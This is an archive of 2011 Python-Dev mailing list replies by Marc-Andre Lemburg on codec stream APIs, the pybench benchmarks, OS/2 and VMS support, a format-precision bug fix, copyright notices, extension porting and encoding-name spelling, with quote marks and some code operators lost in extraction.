Victor Stinner wrote: Le mardi 24 mai 2011 à 10:03 +0200, M.-A. Lemburg a écrit : Please read PEP 100 regarding StreamReader and StreamWriter. Those codecs parts were explicitly designed to be stateful, unlike the stateless encoder/decoder methods. Yes, it is possible to implement stateful StreamReader and StreamWriter classes and we have such codecs (I gave the example of UTF-16), but the state is not exposed (getstate / setstate), and so it's not possible to write generic code to handle the codec state in the base StreamReader and StreamWriter classes. io.TextIOWrapper requires encoder.setstate(0) for example. So instead of always suggesting to deprecate everything, how about you come up with a proposal to add meaningful new methods to those base classes ? Each codec can, however, implement variants which are optimized for the specific encoding or intercept certain stream methods to add functionality or improve the encoding/decoding performance. Can you give me some examples? See the UTF-16 codec in the stdlib for example. This uses some of the available possibilities to interpret the BOM mark and then switches the encoder/decoder methods accordingly. A lot more could be done for other variable length encoding codecs, e.g. UTF-8, since these often have problems near the end of a read due to missing bytes. The base class implementation provides a general purpose implementation to cover the case, but it's not efficient, since it doesn't know anything about the encoding characteristics. Such an implementation would have to be done per codec and that's why we have per codec StreamReader/Writer APIs. TextIOWrapper and StreamReaderWriter are merely wrappers around streams that make use of the codecs. They don't provide any codec logic themselves. That's the conceptual difference. ... StreamReader and StreamWriters ... work efficiently and directly on streams rather than buffers. StreamReader, StreamWriter, TextIOWrapper and StreamReaderWriter all have a file-like API: tell(), seek(), read(), readline(), write(), etc. The implementation is maybe different, but the API is just the same, and so the usecases are just the same. I don't see in which case I should use StreamReader or StreamWriter instead TextIOWrapper. I thought that TextIOWrapper is specific to files on disk, but TextIOWrapper is already used for other usages like sockets. I have no idea why TextIOWrapper was added to the stdlib instead of making StreamReaderWriter more capable, since StreamReaderWriter had already been available in Python since Python 1.6 (and this is being used by codecs.open()). Perhaps we should deprecate TextIOWrapper instead and replace it with codecs.StreamReaderWriter ? ;-) Seriously, I don't see use of TextIOWrapper as an argument for removing StreamReader/Writer parts of the codecs API. Here's my reply from the ticket regarding using incremental encoders/decoders for the StreamReader/Writer parts of the codec set of APIs: The point about having them use incremental codecs for encoding and decoding is a good one and would need to be investigated. If possible, we could use incremental encoders/decoders for the standard StreamReader/Writer base classes or add new IncrementalStreamReader/Writer classes which then use the IncrementalEncode/Decoder per default. Why do you want to write a duplicate feature? TextIOWrapper is already here, it's working and widely used. See above and please also try to understand why we have per-codec implementations for streams. I'm tired of repeating myself. I would much prefer to see the codec-specific functionality in TextIOWrapper added back to the codecs where it belongs. I am working on codec issues (like CJK encodings, see #12100, #12057, #12016) and I would like to remove StreamReader and StreamWriter to have *less* code to maintain. If you want to add more code, will be available to maintain it? It looks like you are busy, some people (not me ;-)) are still waiting .transform()/.untransform()! I dropped the ball on the idea after the strong wave of comments against those methods. People will simply have to use codecs.encode() and codecs.decode(). -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 24 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 27 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com
Re: [Python-Dev] [Python-checkins] cpython (3.2): Avoid codec spelling issues by just using the utf-8 default.
Raymond Hettinger wrote: On May 5, 2011, at 11:41 AM, Benjamin Peterson wrote: 2011/5/5 raymond.hettinger python-check...@python.org: http://hg.python.org/cpython/rev/1a56775c6e54 changeset: 69857:1a56775c6e54 branch: 3.2 parent: 69855:97a4855202b8 user:Raymond Hettinger pyt...@rcn.com date:Thu May 05 11:35:50 2011 -0700 summary: Avoid codec spelling issues by just using the utf-8 default. Out of curiosity, what is the issue? IIRC, the performance depended on how your spelled-it. I believe that is why the spelling got changed in Py3.3. Not really. It got changed because we have canonical names for the codecs which the stdlib should use rather than rely on aliases. Performance-wise it only makes a difference if you use it in tight loops. Either way, the code is simpler by just using the default. ... as long as the casual reader knows what the default it :-) I think it's better to make the choice explicit, if the code relies on a particular non-ASCII encoding. If it doesn't, than the default is fine. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 06 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 45 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Convert Py_Buffer to Py_UNICODE
Sijin Joseph wrote: Hi - I am working on a patch where I have an argument that can either be a unicode string or binary data, I parse the argument using the PyArg_ParseTuple method using the s* format specification and get a Py_Buffer. I now need to convert this Py_Buffer object to a Py_Unicode and pass it into a function. What is the best way to do this? If I determine that the passed argument was binary using another flag parameter then I am passing Py_Buffer-buf as a pointer to the start of the data. I don't understand why you'd want to convert PyUnicode to PyBytes (encoded as UTF-8), only to decode it again afterwards in order to pass it to some other PyUnicode API. It'd be more efficient to use the O parser marker and then use PyObject_GetBuffer() to convert non-PyUnicode objects to a Py_buffer. This is in winsound module, here's the relevant code snippet sound_playsound(PyObject *s, PyObject *args) { Py_buffer *buffer; int flags; int ok; LPCWSTR pszSound; if (PyArg_ParseTuple(args, s*i:PlaySound, buffer, flags)) { if (flags SND_ASYNC flags SND_MEMORY) { /* Sidestep reference counting headache; unfortunately this also prevent SND_LOOP from memory. */ PyBuffer_Release(buffer); PyErr_SetString(PyExc_RuntimeError, Cannot play asynchronously from memory); return NULL; } if(flags SND_MEMORY) { pszSound = buffer-buf; } else { /* pszSound = ; */ } -- Sijin ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/mal%40egenix.com -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, May 02 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 49 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Proposal for a common benchmark suite
Mark Shannon wrote: Maciej Fijalkowski wrote: On Thu, Apr 28, 2011 at 11:10 PM, Stefan Behnel stefan...@behnel.de wrote: M.-A. Lemburg, 28.04.2011 22:23: Stefan Behnel wrote: DasIch, 28.04.2011 20:55: the CPython benchmarks have an extensive set of microbenchmarks in the pybench package Try not to care too much about pybench. There is some value in it, but some of its microbenchmarks are also tied to CPython's interpreter behaviour. For example, the benchmarks for literals can easily be considered dead code by other Python implementations so that they may end up optimising the benchmarked code away completely, or at least partially. That makes a comparison of the results somewhat pointless. The point of the micro benchmarks in pybench is to be able to compare them one-by-one, not by looking at the sum of the tests. If one implementation optimizes away some parts, then the comparison will show this fact very clearly - and that's the whole point. Taking the sum of the micro benchmarks only has some meaning as very rough indicator of improvement. That's why I wrote pybench: to get a better, more details picture of what's happening, rather than trying to find some way of measuring average use. This average is very different depending on where you look: for some applications method calls may be very important, for others, arithmetic operations, and yet others may have more need for fast attribute lookup. I wasn't talking about averages or sums, and I also wasn't trying to put down pybench in general. As it stands, it makes sense as a benchmark for CPython. However, I'm arguing that a substantial part of it does not make sense as a benchmark for PyPy and others. With Cython, I couldn't get some of the literal arithmetic benchmarks to run at all. The runner script simply bails out with an error when the benchmarks accidentally run faster than the initial empty loop. I imagine that PyPy would eventually even drop the loop itself, thus leaving nothing to compare. Does that tell us that PyPy is faster than Cython for arithmetic? I don't think it does. When I see that a benchmark shows that one implementation runs in 100% less time than another, I simply go *shrug* and look for a better benchmark to compare the two. I second here what Stefan says. This sort of benchmarks might be useful for CPython, but they're not particularly useful for PyPy or for comparisons (or any other implementation which tries harder to optimize stuff away). For example a method call in PyPy would be inlined and completely removed if method is empty, which does not measure method call overhead at all. That's why we settled on medium-to-large examples where it's more of an average of possible scenarios than just one. If CPython were to start incorporating any specialising optimisations, pybench wouldn't be much use for CPython. The Unladen Swallow folks didn't like pybench as a benchmark. This is all true, but I think there's a general misunderstanding of what pybench is. I wrote pybench in 1997 when I was working on optimizing the Python 1.5 implementation for use in an web application server. At the time, we had pystone and that was a really poor benchmark for determining of whether certain optimizations in the Python VM and compiler made sense or not. pybench was then improved and extended over the course of several years and then added to Python 2.5 in 2006. The benchmark is written as framework for micro benchmarks based on the assumption of a non-optimizing (byte code) compiler. As such it may or may not work with an optimizing compiler. The calibration part would likely have to be disabled for an optimizing compiler (run with -C 0) and a new set of benchmark tests would have to be added; one which tests the Python implementation at a higher level than the existing tests. That last part is something people tend to forget: pybench is not a monolithic application with a predefined and fixed set of tests. It's a framework that can be extended as needed. All you have to do is add a new module with test classes and import it in Setup.py. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 52 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python
Re: [Python-Dev] Proposal for a common benchmark suite
DasIch wrote: Given those facts I think including pybench is a mistake. It does not allow for a fair or meaningful comparison between implementations which is one of the things the suite is supposed to be used for in the future. This easily leads to misinterpretation of the results from this particular benchmark and it negatively affects the performance data as a whole. The same applies to several Unladen Swallow microbenchmarks such as bm_call_method_*, bm_call_simple and bm_unpack_sequence. I don't think we should exclude any implementation specific benchmarks from a common suite. They will not necessarily allow for comparisons between implementations, but will provide important information about the progress made in optimizing a particular implementation. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 29 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 52 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Proposal for a common benchmark suite
Stefan Behnel wrote: DasIch, 28.04.2011 20:55: the CPython benchmarks have an extensive set of microbenchmarks in the pybench package Try not to care too much about pybench. There is some value in it, but some of its microbenchmarks are also tied to CPython's interpreter behaviour. For example, the benchmarks for literals can easily be considered dead code by other Python implementations so that they may end up optimising the benchmarked code away completely, or at least partially. That makes a comparison of the results somewhat pointless. The point of the micro benchmarks in pybench is to be able to compare them one-by-one, not by looking at the sum of the tests. If one implementation optimizes away some parts, then the comparison will show this fact very clearly - and that's the whole point. Taking the sum of the micro benchmarks only has some meaning as very rough indicator of improvement. That's why I wrote pybench: to get a better, more details picture of what's happening, rather than trying to find some way of measuring average use. This average is very different depending on where you look: for some applications method calls may be very important, for others, arithmetic operations, and yet others may have more need for fast attribute lookup. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 28 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2011-06-20: EuroPython 2011, Florence, Italy 53 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Drop OS/2 and VMS support?
Victor Stinner wrote: Hi, I asked one year ago if we should drop OS/2 support: Andrew MacIntyre, our OS/2 maintainer, answered: http://mail.python.org/pipermail/python-dev/2010-April/099477.html Extract: The 3.x branch needs quite a bit of work on OS/2 to deal with Unicode, as OS/2 was one of the earlier OSes with full multiple language support and IBM developed a unique API. I'm still struggling to come to terms with this, partly because I myself don't need it. So one year later, Python 3 does still not support OS/2. -- About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if Python 3 does work on VMS. I bet that it does just not compile :-) I don't know anyone using VMS or OS/2. -- There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait until someone work on these OSes to ensure that the test suite pass. But if nobody cares of these OSes and nobody wants to maintain them, it would be easier for the maintenance of the Python source code base to remove specific code. Well, not remove directly, but plan to remove it using the PEP 11 procedure (mark OS/2 and VMS as unsupported, and remove the code in Python 3.4). The Python core team is not really representative of the Python community users, so I think this needs a different approach: Instead of simply deprecating OSes without notice to the general Python community, how about doing a call for support for these OSes ? If that doesn't turn up maintainers, then we can take the PEP 11 route. FWIW: There's still a fan-base out there for OS/2 and its successor eComStation: http://en.wikipedia.org/wiki/EComStation http://www.ecomstation.com/ecomstation20.phtml http://www.warpstock.eu/ Same for VMS in form of OpenVMS: http://en.wikipedia.org/wiki/OpenVMS http://h71000.www7.hp.com/index.html?jumpid=/go/openvms http://www.vmspython.org/ -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 19 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Drop OS/2 and VMS support?
Doug Hellmann wrote: On Apr 19, 2011, at 10:36 AM, M.-A. Lemburg wrote: Victor Stinner wrote: Hi, I asked one year ago if we should drop OS/2 support: Andrew MacIntyre, our OS/2 maintainer, answered: http://mail.python.org/pipermail/python-dev/2010-April/099477.html Extract: The 3.x branch needs quite a bit of work on OS/2 to deal with Unicode, as OS/2 was one of the earlier OSes with full multiple language support and IBM developed a unique API. I'm still struggling to come to terms with this, partly because I myself don't need it. So one year later, Python 3 does still not support OS/2. -- About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if Python 3 does work on VMS. I bet that it does just not compile :-) I don't know anyone using VMS or OS/2. -- There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait until someone work on these OSes to ensure that the test suite pass. But if nobody cares of these OSes and nobody wants to maintain them, it would be easier for the maintenance of the Python source code base to remove specific code. Well, not remove directly, but plan to remove it using the PEP 11 procedure (mark OS/2 and VMS as unsupported, and remove the code in Python 3.4). The Python core team is not really representative of the Python community users, so I think this needs a different approach: Instead of simply deprecating OSes without notice to the general Python community, how about doing a call for support for these OSes ? If that doesn't turn up maintainers, then we can take the PEP 11 route. Victor, if you want to post the call for support to Python Insider, let me know off list and I will set you up with access. I can help with that if you like. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 19 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Replace useless %.100s by %s in PyErr_Format()
Victor Stinner wrote: Le jeudi 24 mars 2011 à 13:22 +0100, M.-A. Lemburg a écrit : BTW: Why do you think that %.100s is not supported in PyErr_Format() in Python 2.x ? PyString_FromFormatV() does support this. The change to use Unicode error strings introduced the problem, since PyUnicode_FromFormatV() for some reason ignores the precision (which is shouldn't). Oh... You are right, it is a regression in Python 3. We started to write unit tests for PyBytes_FromFormat() and PyUnicode_FromFormat(), I hope that they will improve the situation. That said, it's a good idea to add the #7330 fix to at least Python 2.7 as well, since ignoring the precision is definitely a bug. It may even be security relevant, since it could be used for DOS attacks on servers (e.g. causing them to write huge strings to log files instead of just a few hundreds bytes per message), so may even need to go into Python 2.6. Python 2 is not affected because PyErr_Format() uses PyString_FromFormatV() which supports precision for %s format (e.g. %.100s truncate the string to 100 bytes). Right, but the PyUnicode_FromFormatV() which ignores the precision is still present in Python 2.6 and 2.7, even though it is not used by PyErr_Format(). Do you think that Python 3.1-3.3 should be fixed? Yes, indeed. The above mentioned security threat is real. The CPython code only has a few cases where this could be use for a DOS (e.g. in the pickle module or the AST code), but since this function is used in 3rd party extensions, those are affected indirectly as well. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Mar 30 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Copyright notices
Nadeem Vawda wrote: I was wondering what the policy is regarding copyright notices and license boilerplate text at the top of source files. I am currently rewriting the bz2 module (see http://bugs.python.org/issue5863), splitting the existing Modules/bz2module.c into Modules/_bz2module.c and Lib/bz2.py. Are new files expected to include a copyright notice and/or license boilerplate text? Since you'll be adding new IP to Python, the new code you write should contain your copyright and the standard PSF contributor agreement notice, e.g. (c) Copyright 2011 by Nadeem Vawda. Licensed to PSF under a Contributor Agreement. (please also make sure you have sent the signed agreement to the PSF; see http://www.python.org/psf/contrib/) We don't have a general copyright or license boiler plate for Python source files. Also, is it necessary for _bz2module.c (new) to retain the copyright notices from bz2module.c (old)? In the tracker issue, Antoine said he didn't think so, but suggested that I get some additional opinions. If the file copies significant code parts from older files, the copyright notices from those files will have to added to the file comment as well - ideally with a note explaining to which parts those copyrights apply and where they originated. If you are replacing the old implementation with a new one, you don't need to copy over the old copyright statements. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Mar 21 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Improvements for Porting C Extension from 2 to 3
Sümer Cip wrote: Hi, While porting a C extension from 2 to 3, I realized that there are some general cases which can be automated. For example, for my specific application (yappi - http://code.google.com/p/yappi/), all I need to do is following things: 1) define PyModuleDef 2) change PyString_AS_STRING calls to _PyUnicode_AsString Aside: Please don't use private APIs in Python extensions. Esp. the above Unicode API is likely going to be phased out. You're better off, using PyUnicode_AsUTF8String() instead and then leaving the PyString_AS_STRING() macro in place. 3) change module init code a little. It occurred to me all these kind of standart changes can be automated via a script. Not sure on the usability of this however, because of my limited knowledge on the area. Does such a tool worth being implemented? I'm not sure whether you can really automate this: The change from 8-bit strings to Unicode support usually requires reconsidering whether you're dealing with plain text, encoded text data or binary data. However, a guide of what to replace and how to change the code would probably help a lot. Please share your thoughts on the python-porting mailint list and/or add to these wiki pages: http://wiki.python.org/moin/PortingToPy3k http://wiki.python.org/moin/PortingExtensionModulesToPy3k Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Mar 03 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote: On Wed, Feb 23, 2011 at 6:32 PM, M.-A. Lemburg m...@egenix.com wrote: Alexander Belopolsky wrote: .. In what sense is Latin-1 the official name? The IANA charset registry has the following listing Name: ISO_8859-1:1987[RFC1345,KXS2] MIBenum: 4 Source: ECMA registry Alias: iso-ir-100 Alias: ISO_8859-1 Alias: ISO-8859-1 (preferred MIME name) Alias: latin1 .. Latin-1 is short for Latin Alphabet No. 1 and started out as ECMA-94 in 1985 and 1986: This does not explain your preference of Latin-1 over Latin1. This is not my preference. See e.g. Wikipedia http://en.wikipedia.org/wiki/ISO/IEC_8859-1 It is common practice to replace spaces in descriptive names with a hyphen to come up with an identifier string (even Google does or undoes this when searching the net). Replacing spaces with an empty string is also an option, but doesn't read as well. Both are perfectly valid abbreviations for Latin Alphabet No. 1. The spelling without - has the advantage of being a valid Python identifier and a module name. The hyphens are converted to underscores by the lookup function in the encodings package. That turns the name into a valid Python module name. The IANA registration for latin1 and lack of that for latin-1 most likely indicates that the former is more commonly found in machine readable metadata. I don't know why you emphasize so much on machine readable metadata. Python source code is machine readable, the Internet is machine readable, all documents found there are machine readable. As I said earlier on: the IANA registry is just that - a registry of names with the purpose of avoiding name clashes in the resp. name space. As such, it is not a standard, but merely a tool to map various aliases to a canoncial name. The fact that an alias is registered doesn't allow any implication on whether it's in wide-spread use or not, e.g. csISOLatin1 gives me 6810 hits on Google. I get 788,000 hits for 'latin1 -latin-1' on Google, 'latin-1' gives 2,600,000 hits. Looks like it's still the preferred way to write that encoding name. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 24 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote: On Wed, Feb 23, 2011 at 4:07 PM, Guido van Rossum gu...@python.org wrote: I'm guessing that one of these encoding names is recognized by the C code while the other one takes the slow path via the aliasing code. This is absolutely right. In fact I am going to propose adding strcmp(lower, latin1) to the following test in PyUnicode_AsEncodedString(): else if ((strcmp(lower, latin-1) == 0) || (strcmp(lower, iso-8859-1) == 0)) return PyUnicode_EncodeLatin1(... I'll open a separate issue for that. In Python's own stdlib and tests latin1 is a more common spelling than latin-1, so it makes sense to optimize it. Latin-1 is the official name and the one used internally by Python, so it would be good to have the test suite and Python code in general to use that variant of the name (just as utf-8 is preferred over utf8). Instead of adding more aliases to the C code, please change the encoding names in the stdlib and test suite. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 23 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote: On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote: .. Latin-1 is the official name and the one used internally by Python, so it would be good to have the test suite and Python code in general to use that variant of the name (just as utf-8 is preferred over utf8). Instead of adding more aliases to the C code, please change the encoding names in the stdlib and test suite. I cannot agree with you on this one. Official or not, latin-1 is much less commonly used than latin1. Currently decode(latin1) is 10x slower than decode(latin-1) on short strings. We already have a check for iso-8859-1 alias in PyUnicode_AsEncodedString(). Adding latin1 (and possibly utf8 as well) is likely to speed up many applications at minimal cost. Fair enough, then add latin1 and utf8 to both PyUnicode_Decode() and PyUnicode_AsEncodedString(). Still, the stdlib and test suite should be examples of using the correct names. I only found these few cases where the wrong Latin-1 name is used in the stdlib: ./distutils/command/bdist_wininst.py: -- # convert back to bytes. latin1 simply avoids any possible -- encoding=latin1) as script: -- script_data = script.read().encode(latin1) ./urllib/request.py: -- data = base64.decodebytes(data.encode('ascii')).decode('latin1') ./asynchat.py: -- encoding= 'latin1' ./ftplib.py: -- encoding = latin1 ./sre_parse.py: -- encode = lambda x: x.encode('latin1') I get 12 hits for the test suite. Yet 108 for the correct name, so I can't follow your statement that the wrong variant is used more often. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 23 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote: On Wed, Feb 23, 2011 at 4:54 PM, M.-A. Lemburg m...@egenix.com wrote: .. Yet 108 for the correct name, so I can't follow your statement that the wrong variant is used more often. Hmm, your grepping skills are probably better than mine. I get $ grep -iw latin-1 Lib/*.py | wc -l 24 and $ grep -iw latin1 Lib/test/*.py | wc -l 25 (I did get spurious hits with naive grep latin1, so I retract my more often claim and just say that both spellings are equally common.) I used a Python script based on re, perhaps that's why :-) grep only counts lines, not multiple instances on a single line and looking through the hits I found, there are a few false positives such as 'latin-10' or 'iso-latin-1'. Without those, I get 83 hits. If you open a ticket for this, I'll add the list of hits to that ticket. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 23 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 